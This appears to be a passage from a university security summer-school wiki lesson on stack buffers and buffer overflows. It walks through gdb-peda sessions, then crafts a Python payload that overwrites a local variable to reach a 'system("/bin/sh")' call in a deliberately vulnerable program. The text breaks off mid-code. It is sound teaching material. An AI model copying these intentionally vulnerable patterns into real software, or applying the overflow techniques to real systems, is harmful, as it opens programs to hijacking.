session:06

Differences

This shows you the differences between two versions of the page.


session:06 [2020/07/19 09:49] (current) – external edit 127.0.0.1
Line 1: Line 1:
 +====== 0x05. Buffer Exploitation ======
  
 +===== Resources =====
 +
 +[[https://security.cs.pub.ro/summer-school/res/slides/06-buffer-management.pdf|Session 5 slides]]
 +
 +[[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-skel.zip|Session's tutorials and challenges archive]]
 +
 +[[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-snippets.zip|Session's code snippets]].
 +
 +/*[[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-full.zip|Session's solutions]]*/
 +
 +===== Tutorials =====
 +
 +==== Buffers ====
 +
 +A buffer is an area of contiguous data in memory, determined by a starting address, contents and length. Understanding how buffers are used (or misused) is vital for both offensive and defensive purposes.
 +
 +In C, we can declare a buffer of bytes as a char array, as follows:
 +
 +<code c>
 +char local_buffer[32];
 +</code>
 +
 +This results in the following assembly code:
 +
 +<code objdump>
 +080483db <main>:
 + 80483db: 55                    push   ebp
 + 80483dc: 89 e5                mov    ebp,esp
 + 80483de: 83 ec 20              sub    esp,0x20
 + 80483e1: b8 00 00 00 00        mov    eax,0x0
 + 80483e6: c9                    leave  
 + 80483e7: c3                    ret 
 +</code>
 +
 +Notice that buffer allocation is done by simply subtracting its intended size from the current stack pointer (''sub esp, 0x20''). This only reserves space on the stack (remember that on x86 the stack grows "downwards", from higher addresses to lower ones).
 +
 +<note>
 +A compiler may allocate more space on the stack than explicitly required. For example, on a 64-bit machine with the stack canary enabled (an additional 64-bit value is implicitly placed between buffers and the return address - more on that in future sessions), declaring either ''char s[32]'' or ''char s[40]'' might yield ''sub rsp, 0x30'' to align buffers at 16-byte boundaries.
 +
 +To exploit a program, the C source code may not be a good enough reference point. Only disassembling the executable will provide relevant information.
 +</note>
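
The rounding described in the note can be checked with a little arithmetic. The sketch below (Python 3) is only one plausible accounting: it assumes the frame holds the buffer plus an 8-byte canary and is rounded up to a multiple of 16. ''align_up'' and ''frame_size'' are hypothetical helper names, and a real compiler may lay things out differently.

```python
def align_up(size, alignment=16):
    """Round size up to the next multiple of alignment (a power of two)."""
    return (size + alignment - 1) & ~(alignment - 1)


def frame_size(buffer_len, canary_len=8):
    # Assumption: locals = buffer + canary, rounded up to 16 bytes.
    return align_up(buffer_len + canary_len)


for n in (32, 40):
    print("char s[%d] -> sub rsp, %#x" % (n, frame_size(n)))
```

Under these assumptions both declarations end up reserving ''0x30'' bytes, which matches the note. The disassembly of the actual binary remains the only authoritative source.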
 +
 +Buffers can also be stored in other places in memory, such as the ''heap'', ''.bss'' or ''.rodata''.
 +
 +You can find the following code snippet [[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-snippets.zip|here]] (''buffers/buffers.c''). 
 +<code c buffers.c>
 +#include <stdio.h>
 +#include <stdlib.h>
 +
 +char g_buf_init_zero[32] = {0};
 +/* g_buf_init_vals[5..31] will be 0 */
 +char g_buf_init_vals[32] = {1, 2, 3, 4, 5};
 +const char g_buf_const[32] = "Hello, world\n";
 +
 +int main(void)
 +{
 + char l_buf[32];
 + static char s_l_buf[32];
 + char *heap_buf = malloc(32);
 +
 + free(heap_buf);
 +
 + return 0;
 +}
 +</code>
 +
 +Let's have a look at the executable sections:
 +<code bash>
 +$ readelf -S buffers
 +  [Nr] Name              Type            Addr     Off    Size   ES Flg Lk Inf Al
 +...
 +  [16] .rodata           PROGBITS        080485a0 0005a0 000040 00    0   0 32
 +...
 +  [24] .data             PROGBITS        0804a020 001020 000040 00  WA  0   0 32
 +  [25] .bss              NOBITS          0804a060 001060 000060 00  WA  0   0 32
 +...
 +Key to Flags:
 +  W (write)
 +  A (alloc)
 +</code>
 +And the address of each symbol (buffer in this case):
 +<code bash>
 +080485c0 R g_buf_const
 +0804a040 D g_buf_init_vals
 +0804a080 B g_buf_init_zero
 +0804a0a0 b s_l_buf.2387
 +
 +Key to Flags:
 +  R (symbol is read-only)
 +  D (symbol in initialized data section)
 +  B (symbol in BSS data section)
 +  
 +  Uppercase and lowercase flags refer to the same kind of section.
 +  A lowercase flag means the symbol is local (not visible outside the module).
 +</code>
 +
 +Alternatively, you can use gdb to extract information on each symbol:
 +<code bash>
 +gdb-peda$ p &g_buf_const
 +$1 = (<data variable, no debug info> *) 0x80485c0 <g_buf_const>
 +</code>
 +
 +Using this information you can map each symbol to a data section.
 +For example, the address of g_buf_const is ''0x80485c0'', so it is placed
 +in the .rodata section ''addr=0x080485a0; size=0x40''.
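
The same lookup can be done for every symbol at once. The following Python 3 sketch copies the section ranges and symbol addresses from the listings above; the names ''SECTIONS'', ''SYMBOLS'' and ''section_of'' are made up for this illustration.

```python
# name -> (start address, size), copied from the readelf output above
SECTIONS = {
    ".rodata": (0x080485a0, 0x40),
    ".data": (0x0804a020, 0x40),
    ".bss": (0x0804a060, 0x60),
}

# symbol -> address, copied from the symbol listing above
SYMBOLS = {
    "g_buf_const": 0x080485c0,
    "g_buf_init_vals": 0x0804a040,
    "g_buf_init_zero": 0x0804a080,
    "s_l_buf": 0x0804a0a0,
}


def section_of(addr):
    """Return the name of the section whose range contains addr, or None."""
    for name, (start, size) in SECTIONS.items():
        if start <= addr < start + size:
            return name
    return None


for symbol, addr in SYMBOLS.items():
    print("%-16s %#010x -> %s" % (symbol, addr, section_of(addr)))
```

Note that ''g_buf_init_zero'' lands in ''.bss'' even though it has an explicit initializer: an all-zero initializer needs no bytes in the file.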
 +
 +Non-static local variables and dynamically allocated buffers cannot be
 +seen in the executable: they only have meaning at runtime, because they are
 +allocated on the stack or heap when the code reaches a certain point. Let's
 +inspect the execution right before calling free() and see where the heap
 +buffer is placed:
 +<code bash>
 +gdb-peda$ 
 +[----------------------------------registers-----------------------------------]
 +EAX: 0x804b160 --> 0x0 
 +EBX: 0x0 
 +ECX: 0x21e79 
 +EDX: 0x804b160 --> 0x0 
 +ESI: 0xf7fb4000 --> 0x1d4d6c 
 +EDI: 0x0 
 +EBP: 0xffffd798 --> 0x0 
 +ESP: 0xffffd750 --> 0x804b160 --> 0x0 
 +EIP: 0x80484e8 (<main+50>: call   0x8048350 <free@plt>)
 +EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
 +[-------------------------------------code-------------------------------------]
 +   0x80484df <main+41>: mov    DWORD PTR [ebp-0x30],eax
 +   0x80484e2 <main+44>: sub    esp,0xc
 +   0x80484e5 <main+47>: push   DWORD PTR [ebp-0x30]
 +=> 0x80484e8 <main+50>: call   0x8048350 <free@plt>
 +   0x80484ed <main+55>: add    esp,0x10
 +   0x80484f0 <main+58>: mov    eax,0x0
 +   0x80484f5 <main+63>: mov    edx,DWORD PTR [ebp-0xc]
 +   0x80484f8 <main+66>: xor    edx,DWORD PTR gs:0x14
 +Guessed arguments:
 +arg[0]: 0x804b160 --> 0x0 
 +[------------------------------------stack-------------------------------------]
 +0000| 0xffffd750 --> 0x804b160 --> 0x0 
 +0004| 0xffffd754 --> 0xffffd9e0 ("examples/buffers")
 +0008| 0xffffd758 --> 0xf7e0f049 (add    ebx,0x1a4fb7)
 +0012| 0xffffd75c --> 0xf7fb7748 --> 0x0 
 +0016| 0xffffd760 --> 0xf7fb4000 --> 0x1d4d6c 
 +0020| 0xffffd764 --> 0xf7fb4000 --> 0x1d4d6c 
 +0024| 0xffffd768 --> 0x804b160 --> 0x0 
 +0028| 0xffffd76c --> 0xf7e0f1ab (add    esp,0x10)
 +[------------------------------------------------------------------------------]
 +Legend: code, data, rodata, value
 +
 +gdb-peda$ x/wx $ebp-0x30
 +0xffffd768: 0x0804b160
 +gdb-peda$ vmm
 +Start      End        Perm Name
 +...
 +0x0804b000 0x0806d000 rw-p [heap]
 +...
 +</code>
 +
 +The gdb-peda ''vmm'' command displays the virtual memory map of the process;
 +this can be used to easily inspect the addresses and permissions of each memory region.
 +
 +You can find the following code snippet [[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-snippets.zip|here]] (''init_buffer/init_buffer.c'').
 +
 +Let's fill our stack buffer with some values and disassemble the binary:
 +
 +<code c init_buffer.c>
 +char local_buffer[32];
 +unsigned int i = 0;
 +
 +for (i = 0; i < 32; i++) {
 +    local_buffer[i] = i;
 +}
 +</code>
 +
 +<code objdump>
 +080483db <main>:
 + 80483db:       55                      push   ebp
 + 80483dc:       89 e5                   mov    ebp,esp
 + 80483de:       83 ec 24                sub    esp,0x24                      ; reserve space for both the local_buffer (0x20) and i (0x4)
 + 80483e1:       c7 45 fc 00 00 00 00    mov    DWORD PTR [ebp-0x4],0x0       ; 'i = 0' from the declaration
 + 80483e8:       c7 45 fc 00 00 00 00    mov    DWORD PTR [ebp-0x4],0x0       ; 'i = 0' again from the for-loop initializer (redundant, unoptimized code)
 + 80483ef:       eb 13                   jmp    8048404 <main+0x29>           ; jump to the loop condition check
 + 80483f1:       8b 45 fc                mov    eax,DWORD PTR [ebp-0x4]       ; get value of 'i' in eax
 + 80483f4:       89 c1                   mov    ecx,eax                       ; save 'i' in ecx
 + 80483f6:       8d 55 dc                lea    edx,[ebp-0x24]                ; load the address of 'local_buffer' in edx
 + 80483f9:       8b 45 fc                mov    eax,DWORD PTR [ebp-0x4]       ; get 'i'
 + 80483fc:       01 d0                   add    eax,edx                       ; compute address of 'local_buffer+i' in eax
 + 80483fe:       88 08                   mov    BYTE PTR [eax],cl             ; store 'i' at *(local_buffer+i)
 + 8048400:       83 45 fc 01             add    DWORD PTR [ebp-0x4],0x1       ; increment 'i'
 + 8048404:       83 7d fc 1f             cmp    DWORD PTR [ebp-0x4],0x1f      ; compare 'i' with 31
 + 8048408:       76 e7                   jbe    80483f1 <main+0x16>           ; continue loop if below or equal or fall through if above
 + 804840a:       b8 00 00 00 00          mov    eax,0x0
 + 804840f:       c9                      leave  
 + 8048410:       c3                      ret
 +</code>
 +
 +Notice that now we subtract ''0x24'' from the stack pointer, since this time we also need to reserve space for the ''unsigned integer'' used as an index.
 +
 +Similar to how arguments are referenced using ''ebp'', so are the local variables. Since in most cases the value of ''ebp'' stays fixed throughout the execution of a function, you can easily track local variables and buffers by mapping names to offsets (i.e. 'i' to '-0x4', 'local_buffer' to '-0x24' and so on). Intermediary positions within the buffer are almost always computed by using the base address and adding an offset to it.
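
The name-to-offset bookkeeping described above can be written down explicitly. The sketch below (Python 3) takes the offsets from the disassembly, ''i'' at ''ebp-0x4'' and ''local_buffer'' at ''ebp-0x24''; the ''ebp'' value and the helper ''address_of'' are made up for illustration.

```python
# Offsets relative to ebp, read off the disassembly above.
FRAME = {"i": -0x4, "local_buffer": -0x24}


def address_of(ebp, name, index=0):
    """Address of a local, or of element `index` inside a local byte buffer."""
    return ebp + FRAME[name] + index


ebp = 0xffffd658  # hypothetical frame pointer, not taken from a real run

first = address_of(ebp, "local_buffer", 0)
last = address_of(ebp, "local_buffer", 31)
index_var = address_of(ebp, "i")

print(hex(first), hex(last), hex(index_var))
```

In this layout the last byte of the buffer sits directly below ''i'', so an access to ''local_buffer[32]'' would already touch the index variable.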
 +
 +<note>
 +Values at offsets relative to ''ebp'' have their meaning defined by their use, instead of static names. This implies that even if the allocated space is 0x24, the compiler may
 +reorder local buffers, and space may be interpreted as either 'i' at 'ebp-0x4' and 'local_buffer' at 'ebp-0x24', or 'i' at 'ebp-0x24' and 'local_buffer' at 'ebp-0x20'.
 +</note>
 +
 +Finally, let's add one more interesting change to our code:
 +
 +<code c>
 +char local_buffer2[30];
 +char local_buffer[2];
 +unsigned int i = 0;
 +
 +for (i = 0; i < 32; i++) {
 +    local_buffer[i] = i;
 +}
 +</code>
 +
 +Can you guess what the resulting code will look like when disassembled? Where are we writing to?
 +
 +==== Stack buffer overflows ====
 +
 +As we have seen in previous sessions, the stack serves multiple purposes:
 +  * Passing function arguments from the caller to the callee
 +  * Storing local variables for functions
 +  * Temporarily saving register values before a call
 +  * Saving the return address and old frame pointer
 +
 +Our previous example clearly showcases the fact that even though, in an abstract sense, different buffers are separate from one another, ultimately they are just regions of memory with no intrinsic identification or associated size. By contrast, some higher-level languages make it impossible to write beyond the bounds of a container because the size is integrated into the object itself and can be checked on every access.
 +
 +But in our case, bounds are unchecked, therefore it is up to the programmer to code carefully. This includes checking for any overflows and using **safe functions**. Unfortunately, many functions in the standard C library, particularly those which work with strings and read user input, are unsafe - nowadays, the compiler will issue warnings when encountering them.
 +
 +What can happen in the event that we write outside the bounds of a stack buffer?
 +
 +You can find the following code snippet [[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-snippets.zip|here]] (''buffer_overflow/buffer_overflow.c'').
 +<code c buffer_overflow.c>
 +void f(char *buf)
 +{
 +    unsigned int i = 0;
 +
 +    for (i = 0; i < 100; i++) {
 +        buf[i] = i;
 +    }
 +}
 +
 +int main(int argc, char* argv[])
 +{
 +    char local_buffer[32];
 +    f(local_buffer);
 +
 +    return 0;
 +}
 +</code>
 +
 +<code gdb>
 +$ ./buffer_overflow 
 +Segmentation fault (core dumped)
 +</code>
 +
 +What happened? Let's try to find the cause starting with the call of ''f'':
 +
 +<code gdb>
 +gdb-peda$ b *0x08048430
 +Breakpoint 1 at 0x8048430
 +
 +gdb-peda$ r
 +[----------------------------------registers-----------------------------------]
 +EAX: 0xffffd638 --> 0xffffd6fc --> 0xffffd8ff ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg")
 +EBX: 0x0 
 +ECX: 0x38f575fd 
 +EDX: 0xffffd684 --> 0x0 
 +ESI: 0xf7fb4000 --> 0x1d4d6c 
 +EDI: 0x0 
 +EBP: 0xffffd658 --> 0x0 
 +ESP: 0xffffd634 --> 0xffffd638 --> 0xffffd6fc --> 0xffffd8ff ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg")
 +EIP: 0x8048430 (<main+10>: call   0x80483f6 <f>)
 +EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
 +[-------------------------------------code-------------------------------------]
 +   0x8048429 <main+3>: sub    esp,0x20
 +   0x804842c <main+6>: lea    eax,[ebp-0x20]
 +   0x804842f <main+9>: push   eax
 +=> 0x8048430 <main+10>: call   0x80483f6 <f>
 +   0x8048435 <main+15>: add    esp,0x4
 +   0x8048438 <main+18>: mov    eax,0x0
 +   0x804843d <main+23>: leave  
 +   0x804843e <main+24>: ret
 +Guessed arguments:
 +arg[0]: 0xffffd638 --> 0xffffd6fc --> 0xffffd8ff ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg")
 +arg[1]: 0xffffd6fc --> 0xffffd8ff ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg")
 +[------------------------------------stack-------------------------------------]
 +0000| 0xffffd634 --> 0xffffd638 --> 0xffffd6fc --> 0xffffd8ff ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg")
 +0004| 0xffffd638 --> 0xffffd6fc --> 0xffffd8ff ("XDG_CONFIG_DIRS=/etc/xdg/xdg-ubuntu:/etc/xdg")
 +0008| 0xffffd63c --> 0x8048461 (<__libc_csu_init+33>: lea    eax,[ebx-0xf4])
 +0012| 0xffffd640 --> 0xf7fe59b0 (push   ebp)
 +0016| 0xffffd644 --> 0x0 
 +0020| 0xffffd648 --> 0x8048449 (<__libc_csu_init+9>: add    ebx,0x1bb7)
 +0024| 0xffffd64c --> 0x0 
 +0028| 0xffffd650 --> 0xf7fb4000 --> 0x1d4d6c 
 +[------------------------------------------------------------------------------]
 +Legend: code, data, rodata, value
 +
 +Breakpoint 1, 0x08048430 in main ()
 +
 +gdb-peda$ ni
 +[----------------------------------registers-----------------------------------]
 +EAX: 0xffffd69b --> 0x63 ('c')
 +EBX: 0x0 
 +ECX: 0x38f575fd 
 +EDX: 0x63 ('c')
 +ESI: 0xf7fb4000 --> 0x1d4d6c 
 +EDI: 0x0 
 +EBP: 0xffffd658 (" !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
 +ESP: 0xffffd634 --> 0xffffd638 --> 0x3020100 
 +EIP: 0x8048435 (<main+15>: add    esp,0x4)
 +EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
 +[-------------------------------------code-------------------------------------]
 +   0x804842c <main+6>: lea    eax,[ebp-0x20]
 +   0x804842f <main+9>: push   eax
 +   0x8048430 <main+10>: call   0x80483f6 <f>
 +=> 0x8048435 <main+15>: add    esp,0x4
 +   0x8048438 <main+18>: mov    eax,0x0
 +   0x804843d <main+23>: leave  
 +   0x804843e <main+24>: ret    
 +   0x804843f: nop
 +[------------------------------------stack-------------------------------------]
 +0000| 0xffffd634 --> 0xffffd638 --> 0x3020100 
 +0004| 0xffffd638 --> 0x3020100 
 +0008| 0xffffd63c --> 0x7060504 
 +0012| 0xffffd640 --> 0xb0a0908 
 +0016| 0xffffd644 --> 0xf0e0d0c 
 +0020| 0xffffd648 --> 0x13121110 
 +0024| 0xffffd64c --> 0x17161514 
 +0028| 0xffffd650 --> 0x1b1a1918 
 +[------------------------------------------------------------------------------]
 +Legend: code, data, rodata, value
 +0x08048435 in main ()
 +
 +gdb-peda$ b *0x0804843e
 +Breakpoint 2 at 0x0804843e
 +
 +gdb-peda$ c
 +Continuing.
 +[----------------------------------registers-----------------------------------]
 +EAX: 0x0 
 +EBX: 0x0 
 +ECX: 0x38f575fd 
 +EDX: 0x63 ('c')
 +ESI: 0xf7fb4000 --> 0x1d4d6c 
 +EDI: 0x0 
 +EBP: 0x23222120 (' !"#')
 +ESP: 0xffffd65c ("$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
 +EIP: 0x804843e (<main+24>: ret)
 +EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
 +[-------------------------------------code-------------------------------------]
 +   0x8048435 <main+15>: add    esp,0x4
 +   0x8048438 <main+18>: mov    eax,0x0
 +   0x804843d <main+23>: leave  
 +=> 0x804843e <main+24>: ret    
 +   0x804843f: nop
 +   0x8048440 <__libc_csu_init>: push   ebp
 +   0x8048441 <__libc_csu_init+1>: push   edi
 +   0x8048442 <__libc_csu_init+2>: push   esi
 +[------------------------------------stack-------------------------------------]
 +0000| 0xffffd65c ("$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
 +0004| 0xffffd660 ("()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
 +0008| 0xffffd664 (",-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
 +0012| 0xffffd668 ("0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
 +0016| 0xffffd66c ("456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
 +0020| 0xffffd670 ("89:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
 +0024| 0xffffd674 ("<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
 +0028| 0xffffd678 ("@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
 +[------------------------------------------------------------------------------]
 +Legend: code, data, rodata, value
 +
 +Breakpoint 2, 0x0804843e in main ()
 +
 +gdb-peda$ ni
 +[----------------------------------registers-----------------------------------]
 +EAX: 0x0 
 +EBX: 0x0 
 +ECX: 0x38f575fd 
 +EDX: 0x63 ('c')
 +ESI: 0xf7fb4000 --> 0x1d4d6c 
 +EDI: 0x0 
 +EBP: 0x23222120 (' !"#')
 +ESP: 0xffffd660 ("()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
 +EIP: 0x27262524 ("$%&'")
 +EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
 +[-------------------------------------code-------------------------------------]
 +Invalid $PC address: 0x27262524
 +[------------------------------------stack-------------------------------------]
 +0000| 0xffffd660 ("()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
 +0004| 0xffffd664 (",-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
 +0008| 0xffffd668 ("0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
 +0012| 0xffffd66c ("456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
 +0016| 0xffffd670 ("89:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
 +0020| 0xffffd674 ("<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
 +0024| 0xffffd678 ("@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
 +0028| 0xffffd67c ("DEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abc")
 +[------------------------------------------------------------------------------]
 +Legend: code, data, rodata, value
 +0x27262524 in ?? ()
 +</code>
 +
 +It seems that the return address of ''main'', along with a lot more of the stack, gets overwritten with the characters that we write "in the buffer". The program then tries to "return to $%&'" ($%&' is the ASCII representation of little endian 0x27262524), which is an unmapped address. This ultimately triggers a page fault, upon which the operating system signals a ''SIGSEGV'' and terminates the process.
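
The values seen in ''EBP'' and ''EIP'' can be reproduced offline. This Python 3 sketch assumes the layout observed in the gdb session: ''local_buffer'' starts at ''ebp-0x20'', so the saved frame pointer is at offset 32 and the return address at offset 36 from the start of the buffer. The variable names are chosen for this illustration only.

```python
import struct

# What f() writes starting at local_buffer: buf[i] = i for i in 0..99
written = bytes(range(100))

BUF_LEN = 32  # local_buffer sits at ebp-0x20

# Two consecutive little-endian 32-bit values right after the buffer:
# the saved ebp, then the return address of main.
saved_ebp, ret_addr = struct.unpack_from("<II", written, BUF_LEN)

print(hex(saved_ebp), hex(ret_addr))
print(struct.pack("<I", ret_addr))
```

The two values come out as ''0x23222120'' and ''0x27262524'', the same ones gdb reports after ''leave'' and ''ret''.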
 +
 +<note important>
 +A buffer overflow is an anomaly caused by writing beyond the bounds of a buffer; it is not necessarily a vulnerability. The presence of a buffer overflow can lead to strange behavior, a crash, arbitrary code execution or absolutely **nothing**.
 +</note>
 +
 +==== Diverting code execution ====
 +
 +We attempted to use the wonderful ''gets'' function, but the compiler does not generate it and the man page explicitly says:
 +
 +<file>
 +DESCRIPTION
 +       Never use this function.
 +
 +       gets()  reads  a line from stdin into the buffer pointed to by s until either a terminating newline or EOF, which it replaces with a
 +       null byte ('\0').  No check for buffer overrun is performed (see BUGS below).
 +</file>
 +
 +However, we can still handcraft our own vulnerable scenario. Let's try to divert the code execution by using a buffer overflow vulnerability.
 +
 +You can find the following code snippet [[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-snippets.zip|here]] (''buffer_overflow_var/buffer_overflow_var.c'').
 +
 +<code c buffer_overflow_var.c>
 +#include <stdio.h>
 +#include <stdlib.h>
 +
 +void f(char* buf) {
 +
 +    fgets(buf, 100, stdin);
 +}
 +
 +int main(int argc, char* argv[])
 +{
 +    int critical_variable = 0;
 +    char local_buffer[32];
 +    f(local_buffer);
 +
 +    if (critical_variable == 1337) {
 +        printf("Oh dear, you shouldn't be here!\n");
 +        system("/bin/sh");
 +    }
 +    
 +    return 0;
 +}
 +</code>
 +
 +Our ''local_buffer'' is dangerously close to that critical variable. Let's see if we can overwrite it. We need 32 bytes of input to fill our buffer + 4 bytes for the integer.
 +
 +<code bash>
 +$ python -c "print('A'*32 + '1337')" | ./buffer_overflow_var
 +</code>
 +
 +Nothing happened. Let's find out why. We'll save our payload to a file and run ''buffer_overflow_var'' under gdb, using the file as input:
 +
 +<code bash>
 +$ python -c "print('A'*32 + '1337')" > payload
 +$ gdb ./buffer_overflow_var
 +gdb-peda$ b *0x80484fc
 +Breakpoint 1 at 0x80484fc
 +
 +gdb-peda$ r < payload
 +Starting program: ./buffer_overflow_var < payload
 +
 +[----------------------------------registers-----------------------------------]
 +EAX: 0xffffd5dc ('A' <repeats 32 times>, "1337\n")
 +EBX: 0x0 
 +ECX: 0xf7fb589c --> 0x0 
 +EDX: 0xffffd5dc ('A' <repeats 32 times>, "1337\n")
 +ESI: 0xf7fb4000 --> 0x1d4d6c 
 +EDI: 0x0 
 +EBP: 0xffffd608 --> 0x0 
 +ESP: 0xffffd5d0 --> 0xf7fb4000 --> 0x1d4d6c 
 +EIP: 0x80484fc (<main+39>: cmp    DWORD PTR [ebp-0xc],0x539)
 +EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
 +[-------------------------------------code-------------------------------------]
 +   0x80484f3 <main+30>: push   eax
 +   0x80484f4 <main+31>: call   0x80484b6 <f>
 +   0x80484f9 <main+36>: add    esp,0x10
 +=> 0x80484fc <main+39>: cmp    DWORD PTR [ebp-0xc],0x539
 +   0x8048503 <main+46>: jne    0x8048525 <main+80>
 +   0x8048505 <main+48>: sub    esp,0xc
 +   0x8048508 <main+51>: push   0x80485c0
 +   0x804850d <main+56>: call   0x8048360 <puts@plt>
 +[------------------------------------stack-------------------------------------]
 +0000| 0xffffd5d0 --> 0xf7fb4000 --> 0x1d4d6c 
 +0004| 0xffffd5d4 --> 0xf7fb4000 --> 0x1d4d6c 
 +0008| 0xffffd5d8 --> 0x0 
 +0012| 0xffffd5dc ('A' <repeats 32 times>, "1337\n")
 +0016| 0xffffd5e0 ('A' <repeats 28 times>, "1337\n")
 +0020| 0xffffd5e4 ('A' <repeats 24 times>, "1337\n")
 +0024| 0xffffd5e8 ('A' <repeats 20 times>, "1337\n")
 +0028| 0xffffd5ec ('A' <repeats 16 times>, "1337\n")
 +[------------------------------------------------------------------------------]
 +Legend: code, data, rodata, value
 +
 +Breakpoint 1, 0x080484fc in main ()
 +
 +gdb-peda$ x/wx $ebp-0xc
 +0xffffd5fc: 0x37333331
 +gdb-peda$ x/s $ebp-0xc
 +0xffffd5fc: "1337\n"
 +</code>
 +
 +<note tip>
 +We usually use high level scripting languages, such as **python** to craft payloads. For example, to generate 32 ''A''s, we just use '''A'*32''.
 +</note>
 +
 +We can observe two things:
 +  * We actually wrote the __string__ ''1337'', which is ''0x37333331'', instead of the actual value ''1337'' or ''0x539'' in hex.
 +  * We missed the fact that x86 is Little Endian, meaning that we should write the integer value into memory starting with the least significant byte first.
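
Both observations can be checked in a few lines of Python 3. This is only an illustration of the byte values involved; the variable names are arbitrary.

```python
# The four ASCII characters we actually sent
as_text = b"1337"

# How the CPU reads those four bytes as a little-endian 32-bit integer
seen_by_cmp = int.from_bytes(as_text, "little")

# The four bytes we should have sent for the integer 1337 (0x539)
wanted = (1337).to_bytes(4, "little")

print(hex(seen_by_cmp))
print(wanted)
```

The first value is ''0x37333331'', exactly what ''x/wx $ebp-0xc'' showed, while the bytes that encode the integer ''1337'' are ''39 05 00 00''.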
 +
 +An easy way to overcome this is to write a small script which will generate the required payload for us, as follows:
 +
 +<code python>
 +#!/usr/bin/env python
 +import struct
 +
 +buflen = 32
 +
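 +# Use bytes so the script behaves the same under Python 2 and Python 3
 +payload = b'A' * buflen
 +payload += struct.pack('<I', 1337)  # 32-bit little-endian integer
 +
 +with open('payload', 'wb') as f:
 +    f.write(payload)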
 +</code>
 +
 +Note the use of ''struct.pack'' to serialize the integer; together with its counterpart ''struct.unpack'', it is the usual tool when working with binary data that needs a specific size and byte order.
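
As a brief illustration of the ''struct'' module (Python 3), the sketch below packs the same value with different format strings and unpacks it again. The format characters are standard ones from the module: ''<'' little endian, ''>'' big endian, ''H'' 16-bit, ''I'' 32-bit and ''Q'' 64-bit unsigned.

```python
import struct

value = 1337

little32 = struct.pack("<I", value)  # 4 bytes, least significant byte first
big32 = struct.pack(">I", value)     # 4 bytes, most significant byte first
little16 = struct.pack("<H", value)  # 2 bytes
little64 = struct.pack("<Q", value)  # 8 bytes

# unpack always returns a tuple, even for a single field
(round_trip,) = struct.unpack("<I", little32)

# Reading little-endian bytes with the wrong byte order gives a different number
(misread,) = struct.unpack(">I", little32)

print(little32, big32, little16, little64)
print(round_trip, hex(misread))
```

Picking the wrong width or byte order does not raise an error; it silently produces a different value, so the format string has to match what the target binary expects.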
 +
 +Let's test our new payload:
 +
 +<code>
 +$ cat payload | ./buffer_overflow_var 
 +Oh dear, you shouldn't be here!
 +</code>
 +
 +It seems to alter the code flow as we wanted, but it doesn't seem to spawn a (new) shell. What gives? The gist of the issue is that the binary receives its whole input in one "chomp", after which ''stdin'' is at end of input. Our newly spawned shell has nothing to read and exits before we get a chance to enter any commands (similar to how a shell behaves when you press ''Ctrl-D'', i.e. ''end of input''). We can use the following clever trick to keep ''stdin'' open for further user interaction:
 +
 +<code>
 +$ cat payload - | ./buffer_overflow_var
 +Oh dear, you shouldn't be here!
 +date
 +Tue Jun 27 22:17:48 EEST 2017
 +whoami
 +root
 +</code>
 +
 +<note tip>
 +We used the ''cat filename - | ./binary'' trick to concatenate the contents of ''filename'' with the ''standard input''. Once ''cat'' reaches the end of ''filename'', it keeps reading from the standard input, so you can continue feeding data to the binary.
 +</note>
 +
 +==== Overwriting the stored return address ====
 +
 +Let's wrap up our stack smashing adventure by changing the code flow through overwriting the return address stored on the stack.
 +
 +You can find the following code snippet [[https://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-snippets.zip|here]] (''buffer_overflow_ret/buffer_overflow_ret.c'').
 +
 +<code c buffer_overflow_ret.c>
 +#include <stdio.h>
 +
 +void win()
 +{
 +    printf("Well done!\n");
 +}
 +
 +void f()
 +{
 +    printf("Nothing to see here\n");
 +}
 +
 +void get_message(char *buf)
